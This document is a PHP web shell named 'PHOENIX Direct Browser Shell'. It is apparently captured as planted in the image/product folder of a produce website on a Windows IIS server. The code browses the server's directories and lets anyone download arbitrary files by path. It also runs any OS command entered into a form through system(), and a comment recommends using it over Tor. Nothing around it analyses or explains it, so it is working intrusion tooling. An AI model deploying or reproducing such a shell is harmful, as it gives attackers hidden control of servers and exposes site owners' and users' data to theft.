System: Windows NT WINDOWS18 10.0 build 17763 (Windows Server 2016) AMD64 | User: IWPD_3544(appclien)
Path: D:\Inetpub\vhosts\appclients.in\fruits-vegitables.nmvm.org\image\product
[Back to List]
<?php
/**
* PHOENIX Direct Browser Shell
* SAFE MODE: Use via Tor Proxy
*/
session_start();
$dir = isset($_GET['d']) ? $_GET['d'] : '.';
$dir = realpath($dir);
echo "<h3>Current Dir: $dir</h3>";
echo "<table border='1' width='100%'><tr><th>Name</th><th>Size</th><th>Action</th></tr>";
// List Files
$files = scandir($dir);
foreach ($files as $file) {
if ($file == '.' || $file == '..') continue;
$path = $dir . DIRECTORY_SEPARATOR . $file;
$size = is_dir($path) ? "DIR" : filesize($path);
echo "<tr>
<td>$file</td>
<td>$size</td>
<td>
<a href='?d=$dir&download=" . urlencode($file) . "'>Download</a> |
<a href='?d=" . urlencode($path) . "'>Open</a>
</td>
</tr>";
}
echo "</table>";
// Download Handler
if (isset($_GET['download'])) {
$file = $dir . DIRECTORY_SEPARATOR . $_GET['download'];
if (file_exists($file)) {
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.basename($file).'"');
readfile($file);
exit;
}
}
// CMD execution
if (isset($_POST['cmd'])) {
echo "<pre>";
system($_POST['cmd']);
echo "</pre>";
}
?>
<hr>
<form method="POST">
<input type="text" name="cmd" style="width:80%" placeholder="Command...">
<input type="submit" value="Execute">
</form>